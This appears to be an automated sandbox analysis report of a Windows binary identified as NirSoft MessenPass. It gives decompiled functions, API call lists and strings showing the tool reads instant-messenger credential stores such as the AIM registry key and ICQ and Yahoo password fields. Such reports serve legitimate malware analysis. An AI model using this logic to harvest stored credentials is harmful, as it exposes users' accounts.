                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040A792,00000000), ref: 004067E5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                          • Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
                                          • Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                          • Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004067BA(CHAR* _a4) {
                                          				void* _t3;
                                          
                                          				_t3 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
                                          				return _t3;
                                          			}

                                          APIs
                                          • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                          • Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
                                          • Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                          • Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404CE0(signed int* __esi) {
                                          				struct HINSTANCE__* _t3;
                                          				int _t4;
                                          
                                          				_t3 =  *__esi;
                                          				__esi[1] = __esi[1] & 0x00000000;
                                          				if(_t3 != 0) {
                                          					_t4 = FreeLibrary(_t3); // executed
                                          					 *__esi =  *__esi & 0x00000000;
                                          					return _t4;
                                          				}
                                          				return _t3;
                                          			}

                                          APIs
                                          • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                          • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                          • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                          • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                          • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
                                          • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                          • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00407930(signed int* __esi) {
                                          				int _t2;
                                          				void* _t3;
                                          
                                          				_t3 =  *__esi;
                                          				if(_t3 != 0xffffffff) {
                                          					_t2 = FindClose(_t3); // executed
                                          					 *__esi =  *__esi | 0xffffffff;
                                          					return _t2;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                          • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
                                          • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                          • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                          • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                          • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                          • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004069D3(CHAR* _a4) {
                                          				long _t4;
                                          
                                          				_t4 = GetFileAttributesA(_a4); // executed
                                          				return 0 | _t4 != 0xffffffff;
                                          			}

                                          APIs
                                          • GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                          • Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
                                          • Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                          • Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 100%
                                          			E0040BA30(void* __eax, void* __ebx) {
                                          				char _v264;
                                          				char _v524;
                                          				void* __edi;
                                          				void* __esi;
                                          				long _t13;
                                          				void* _t18;
                                          				int _t19;
                                          				long _t20;
                                          				void* _t27;
                                          				void* _t31;
                                          
                                          				_t27 = __ebx;
                                          				_t31 = __eax;
                                          				_t13 = GetTempPathA(0x104,  &_v524);
                                          				_t32 = _t13;
                                          				if(_t13 == 0) {
                                          					GetWindowsDirectoryA( &_v524, 0x104);
                                          				}
                                          				_v264 = 0;
                                          				GetTempFileNameA( &_v524, 0x418628, 0,  &_v264);
                                          				_t18 = E0040B9EA(_t31, _t32,  &_v264, 2, 1);
                                          				if(_t18 != 0) {
                                          					_t19 = OpenClipboard( *(_t31 + 0x108));
                                          					_t34 = _t19;
                                          					if(_t19 == 0) {
                                          						_t20 = GetLastError();
                                          					} else {
                                          						_t20 = E004068B5(_t27, 0x104, _t31, _t34,  &_v264);
                                          					}
                                          					if(_t20 != 0) {
                                          						E00406830(_t20,  *(_t31 + 0x108));
                                          					}
                                          					return DeleteFileA( &_v264);
                                          				}
                                          				return _t18;
                                          			}

                                          APIs
                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040BA4A
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BA5C
                                          • GetTempFileNameA.KERNEL32(?,00418628,00000000,?), ref: 0040BA7E
                                          • OpenClipboard.USER32(?), ref: 0040BA9E
                                          • GetLastError.KERNEL32 ref: 0040BAB7
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040BAD4
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                          • String ID:
                                          • API String ID: 2014771361-0
                                          • Opcode ID: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                          • Instruction ID: 5bfde055311aa1c1ac8a047c999dbef42aa9d8293b3a95092e24ac928ebec7a0
                                          • Opcode Fuzzy Hash: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                          • Instruction Fuzzy Hash: E9115276600218ABDB609BA1DC49FCB77BCAB54701F0040B6B69AE2091DBB499C58F68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406B06() {
                                          
                                          				if( *0x41e164 == 0) {
                                          					0x41e160->dwOSVersionInfoSize = 0x94;
                                          					GetVersionExA(0x41e160);
                                          				}
                                          				return 0x41e160;
                                          			}




                                          APIs
                                          • GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Version
                                          • String ID: `A
                                          • API String ID: 1889659487-1337903584
                                          • Opcode ID: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
                                          • Instruction ID: da77bcce2c8e52e385cf56c8afe7a40ad3a24cfb33d571a5ca18312b8fc7eb0c
                                          • Opcode Fuzzy Hash: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
                                          • Instruction Fuzzy Hash: 8EC00279911225EBD6205B59BD08BC677A8A74D355F018476A901A2264C3F81C45C799
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • strlen.MSVCRT ref: 00412B87
                                          • _strncoll.MSVCRT ref: 00412B97
                                          • memcpy.MSVCRT ref: 00412C13
                                          • atoi.MSVCRT ref: 00412C24
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00412C50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                          • API String ID: 1864335961-3210201812
                                          • Opcode ID: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                          • Instruction ID: 3bd07b0f0ec87f02ccef6cae80a33f2a43e47736a5c113f17b6628cc3434821e
                                          • Opcode Fuzzy Hash: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                          • Instruction Fuzzy Hash: 3BF125B1C042989EDF25CF94C9687DDBBB1AB05308F1481CAD8596B242D7B84ECACF5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 004117DE
                                          • GetDlgItem.USER32(?,000003E8), ref: 004117EA
                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 004117F9
                                          • GetWindowLongA.USER32(?,000000F0), ref: 00411805
                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041180E
                                          • GetWindowLongA.USER32(?,000000EC), ref: 0041181A
                                          • GetWindowRect.USER32(00000000,?), ref: 0041182C
                                          • GetWindowRect.USER32(?,?), ref: 00411837
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041184B
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411859
                                          • GetDC.USER32 ref: 00411892
                                          • strlen.MSVCRT ref: 004118D2
                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 004118E3
                                          • ReleaseDC.USER32(?,?), ref: 00411930
                                          • sprintf.MSVCRT ref: 004119F0
                                          • SetWindowTextA.USER32(?,?), ref: 00411A04
                                          • SetWindowTextA.USER32(?,00000000), ref: 00411A22
                                          • GetDlgItem.USER32(?,00000001), ref: 00411A58
                                          • GetWindowRect.USER32(00000000,?), ref: 00411A68
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411A76
                                          • GetClientRect.USER32(?,?), ref: 00411A8D
                                          • GetWindowRect.USER32(?,?), ref: 00411A97
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411ADD
                                          • GetClientRect.USER32(?,?), ref: 00411AE7
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411B1F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                          • String ID: %s:$EDIT$STATIC
                                          • API String ID: 1703216249-3046471546
                                          • Opcode ID: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                          • Instruction ID: b52727e0d403183305b875c614282f55299ec8bf2f46e0c3c56b37a88aeefe3f
                                          • Opcode Fuzzy Hash: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                          • Instruction Fuzzy Hash: B2B1DF72108341AFD711DF68C985AABBBE9FF88704F00492DFA9993261DB75E904CF16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EndDialog.USER32(?,?), ref: 004105EE
                                          • GetDlgItem.USER32(?,000003EA), ref: 00410606
                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00410625
                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 00410632
                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0041063B
                                          • memset.MSVCRT ref: 00410663
                                          • memset.MSVCRT ref: 00410683
                                          • memset.MSVCRT ref: 004106A1
                                          • memset.MSVCRT ref: 004106BA
                                          • memset.MSVCRT ref: 004106D8
                                          • memset.MSVCRT ref: 004106F1
                                          • GetCurrentProcess.KERNEL32 ref: 004106F9
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041071E
                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00410754
                                          • memset.MSVCRT ref: 0041078F
                                          • GetCurrentProcessId.KERNEL32 ref: 0041079D
                                          • memcpy.MSVCRT ref: 004107CC
                                          • _mbscpy.MSVCRT ref: 004107EE
                                          • sprintf.MSVCRT ref: 00410859
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 00410872
                                          • GetDlgItem.USER32(?,000003EA), ref: 0041087C
                                          • SetFocus.USER32(00000000), ref: 00410883
                                          Strings
                                          • {Unknown}, xrefs: 00410668
                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 00410853
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                          • API String ID: 1428123949-3474136107
                                          • Opcode ID: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                          • Instruction ID: 62e2ad0b84330276400548424eb425e056568d51af16bfff45d60a010caf4195
                                          • Opcode Fuzzy Hash: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                          • Instruction Fuzzy Hash: 1D7108B2804248FFD721DF51EC45EDB7BACEF48344F04443EF54892160EA759A94CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E0040B4F6(void* __ecx, void* __eflags) {
                                          				void* __edi;
                                          				void* __esi;
                                          				struct HMENU__* _t115;
                                          				struct HWND__* _t117;
                                          				void* _t119;
                                          				intOrPtr _t123;
                                          				void* _t128;
                                          				void* _t129;
                                          				intOrPtr _t131;
                                          				void* _t164;
                                          				void* _t165;
                                          				int _t170;
                                          				void* _t171;
                                          				void* _t172;
                                          				void* _t176;
                                          				void* _t185;
                                          				void* _t195;
                                          				void* _t196;
                                          				intOrPtr _t198;
                                          				intOrPtr _t199;
                                          				void* _t200;
                                          				intOrPtr* _t201;
                                          				int _t203;
                                          				intOrPtr* _t208;
                                          				int* _t209;
                                          				void* _t211;
                                          				intOrPtr* _t212;
                                          				void* _t214;
                                          
                                          				_t214 = __eflags;
                                          				_t209 = _t211 - 0x78;
                                          				_t212 = _t211 - 0xa0;
                                          				_t165 = __ecx;
                                          				 *(_t209 - 0x28) =  *(_t209 - 0x28) & 0x00000000;
                                          				 *(_t209 - 0x24) =  *(_t209 - 0x24) & 0x00000000;
                                          				 *((char*)(_t209 - 0x20)) = 0;
                                          				 *((char*)(_t209 - 0x1f)) = 1;
                                          				 *((char*)(_t209 - 0x1e)) = 0;
                                          				 *((char*)(_t209 - 0x1d)) = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				 *((intOrPtr*)(_t209 - 0x14)) = 6;
                                          				 *((intOrPtr*)(_t209 - 0x10)) = 0x9c56;
                                          				 *((char*)(_t209 - 0xc)) = 4;
                                          				 *((char*)(_t209 - 0xb)) = 0;
                                          				 *((char*)(_t209 - 0xa)) = 0;
                                          				 *((char*)(_t209 - 9)) = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				 *_t209 = 1;
                                          				_t209[1] = 0x9c41;
                                          				_t209[2] = 4;
                                          				_t209[2] = 0;
                                          				_t209[2] = 0;
                                          				_t209[2] = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t209[5] = 5;
                                          				_t209[6] = 0x9c44;
                                          				_t209[7] = 4;
                                          				_t209[7] = 0;
                                          				_t209[7] = 0;
                                          				_t209[7] = 0;
                                          				_t209[0x1b] = _t209[0x1b] | 0xffffffff;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t209[0xa] = 2;
                                          				_t209[0xb] = 0x9c48;
                                          				_t209[0xc] = 4;
                                          				_t209[0xc] = 0;
                                          				_t209[0xc] = 0;
                                          				_t209[0xc] = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t209[0xf] = 3;
                                          				_t209[0x10] = 0x9c49;
                                          				_t209[0x11] = 4;
                                          				_t209[0x11] = 0;
                                          				_t209[0x11] = 0;
                                          				_t209[0x11] = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t209[0x14] = 4;
                                          				_t209[0x15] = 0x9c42;
                                          				_t209[0x16] = 4;
                                          				_t209[0x16] = 0;
                                          				_t209[0x16] = 0;
                                          				_t209[0x16] = 0;
                                          				asm("stosd");
                                          				_t196 = 0x66;
                                          				asm("stosd");
                                          				_t115 = E00408A29(_t196);
                                          				 *(__ecx + 0x11c) = _t115;
                                          				SetMenu( *(__ecx + 0x108), _t115);
                                          				_t117 =  *0x41502c(0x50000000, 0x417c88,  *(_t165 + 0x108), 0x101, _t185, _t195, _t164);
                                          				 *(_t165 + 0x114) = _t117;
                                          				SendMessageA(_t117, 0x404, 1,  &(_t209[0x1b]));
                                          				_t119 = LoadImageA( *0x41dbd4, 0x68, 0, 0, 0, 0x9060);
                                          				 *((intOrPtr*)(_t165 + 0x118)) =  *0x415044( *(_t165 + 0x108), 0x50010900, 0x102, 7, 0, _t119, _t209 - 0x28, 7, 0x10, 0x10, 0x70, 0x10, 0x14);
                                          				E00403CB2( *((intOrPtr*)(_t165 + 0x390)), _t214, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t165 + 0x108), 0x103,  *0x41dbd4, 0), 1);
                                          				_t123 =  *((intOrPtr*)(_t165 + 0x390));
                                          				_t170 =  *(_t123 + 0x1b0);
                                          				_t198 =  *((intOrPtr*)(_t123 + 0x1b4));
                                          				_t209[0x1c] =  *(_t123 + 0x184);
                                          				if(_t170 <= 0) {
                                          					L3:
                                          					_t199 =  *((intOrPtr*)(_t165 + 0x390));
                                          					E0040AC28(_t199);
                                          					 *0x415040( *((intOrPtr*)(_t199 + 0x18c)), 0);
                                          					_t128 = E00407017(0x6d);
                                          					_t171 = 0xffffff;
                                          					_t129 =  *0x41503c( *((intOrPtr*)(_t199 + 0x18c)), _t128);
                                          					if( *((intOrPtr*)(_t199 + 0x1b8)) != 0) {
                                          						E0040AB96(_t129, _t171, 0, _t199);
                                          					}
                                          					_t200 = 0x68;
                                          					 *((intOrPtr*)(_t165 + 0x170)) = E00408A29(_t200);
                                          					_t131 =  *((intOrPtr*)(_t165 + 0x398));
                                          					if( *((intOrPtr*)(_t131 + 0x30)) <= 0) {
                                          						_t172 = 0x417c88;
                                          					} else {
                                          						if( *((intOrPtr*)(_t131 + 0x1c)) <= 0) {
                                          							_t172 = 0;
                                          						} else {
                                          							_t172 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xc)))) +  *((intOrPtr*)(_t131 + 0x10));
                                          						}
                                          					}
                                          					0x413dce(_t172, "/noloadsettings");
                                          					_t221 = _t131;
                                          					if(_t131 == 0) {
                                          						RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
                                          					}
                                          					_t201 = _t165 + 0x38c;
                                          					E0040D725( *_t201, _t221);
                                          					E0040BBF0(_t165, 0);
                                          					 *( *_t201 + 0x724) = 1;
                                          					SetFocus( *( *((intOrPtr*)(_t165 + 0x390)) + 0x184));
                                          					if( *0x41e678 == 0) {
                                          						E004069FA(0x41e678);
                                          						if((GetFileAttributesA(0x41e678) & 0x00000001) != 0) {
                                          							GetTempPathA(0x104, 0x41e678);
                                          						}
                                          					}
                                          					_t203 = strlen(0x41e678);
                                          					 *_t212 = 0x4185dc;
                                          					_t94 = strlen(??) + 1; // 0x1
                                          					_t224 = _t203 + _t94 - 0x104;
                                          					if(_t203 + _t94 >= 0x104) {
                                          						 *((char*)(_t165 + 0x180)) = 0;
                                          					} else {
                                          						E00406B4B(_t165 + 0x180, 0x41e678, "report.html");
                                          					}
                                          					_push(1);
                                          					_t176 = 0x30;
                                          					E0040AD6F( *((intOrPtr*)(_t165 + 0x390)), _t176);
                                          					E0040B4DB(_t165);
                                          					 *((intOrPtr*)(_t165 + 0x394)) = RegisterClipboardFormatA("commdlg_FindReplace");
                                          					E0040AFE6(_t176, _t165, _t224, 0);
                                          					if(E004077AF( *((intOrPtr*)(_t165 + 0x398)), ?str?, 3) >= 0) {
                                          						 *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x390)) + 0x1c8)) = E00406D5A(E0040779F(_t148,  *((intOrPtr*)(_t165 + 0x398))) + 3);
                                          					}
                                          					_t209[0x19] = 0x12c;
                                          					_t209[0x1a] = 0x400;
                                          					SendMessageA( *(_t165 + 0x114), 0x404, 2,  &(_t209[0x19]));
                                          					return SendMessageA( *(_t165 + 0x114), 0x401, 0x1001, 0);
                                          				} else {
                                          					_t208 = _t198 + 0xc;
                                          					_t209[0x1d] = _t170;
                                          					do {
                                          						E00404E68( *((intOrPtr*)(_t208 + 4)),  *((intOrPtr*)(_t208 - 8)), _t209[0x1c],  *((intOrPtr*)(_t208 - 0xc)),  *((intOrPtr*)(_t208 - 4)),  *_t208);
                                          						_t212 = _t212 + 0x10;
                                          						_t208 = _t208 + 0x14;
                                          						_t75 =  &(_t209[0x1d]);
                                          						 *_t75 = _t209[0x1d] - 1;
                                          					} while ( *_t75 != 0);
                                          					goto L3;
                                          				}
                                          			}
































                                          APIs
                                            • Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
                                            • Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54
                                          • SetMenu.USER32(?,00000000), ref: 0040B61C
                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
                                          • _strcmpi.MSVCRT ref: 0040B799
                                          • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
                                          • SetFocus.USER32(?), ref: 0040B7E1
                                          • GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
                                          • GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
                                          • strlen.MSVCRT ref: 0040B812
                                          • strlen.MSVCRT ref: 0040B820
                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D
                                            • Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
                                            • Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9
                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
                                          • String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html$xA
                                          • API String ID: 2862451953-132385428
                                          • Opcode ID: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                          • Instruction ID: 58ee6bec69cc5a2ead352e1dc17fbc33d0493dc4f48ef93b1c15430ab04c662e
                                          • Opcode Fuzzy Hash: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                          • Instruction Fuzzy Hash: 4FC1F271500244EFEB129F64C84ABDA7FA5EF54708F04407EFA446F2D2CBB95944CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040F94E: SetFilePointer.KERNEL32(0040F292,?,00000000,00000000,00418AF8,00000000,?,?,0040F8C4,?,00000000,?,73BCF560), ref: 0040F968
                                            • Part of subcall function 0040F94E: memset.MSVCRT ref: 0040F973
                                          • _strcmpi.MSVCRT ref: 0040F729
                                          • _strcmpi.MSVCRT ref: 0040F740
                                          • _strcmpi.MSVCRT ref: 0040F757
                                          • _strcmpi.MSVCRT ref: 0040F76E
                                          • _strcmpi.MSVCRT ref: 0040F792
                                          • _strcmpi.MSVCRT ref: 0040F7A6
                                          • _strcmpi.MSVCRT ref: 0040F7BA
                                          • _strcmpi.MSVCRT ref: 0040F7CE
                                          • _strcmpi.MSVCRT ref: 0040F7E2
                                          • _mbscpy.MSVCRT ref: 0040F831
                                          • _strcmpi.MSVCRT ref: 0040F843
                                          • _mbscpy.MSVCRT ref: 0040F88E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi$_mbscpy$FilePointermemset
                                          • String ID: LoginName$UIN$e-mail$gg_1$icq$icq_1$password$yahoo_id
                                          • API String ID: 3770779768-1670397801
